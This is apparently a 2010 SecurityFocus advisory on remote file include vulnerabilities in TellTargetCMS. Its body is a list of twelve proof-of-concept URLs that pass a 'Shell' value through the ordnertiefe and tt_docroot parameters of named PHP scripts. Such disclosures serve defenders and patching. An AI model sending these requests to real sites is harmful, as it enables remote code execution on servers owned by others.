TellTargetCMS Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/phplib/site_conf.php?ordnertiefe=Shell
http://www.example.com/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
http://www.example.com/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell


 

Privacy Statement
Copyright 2010, SecurityFocus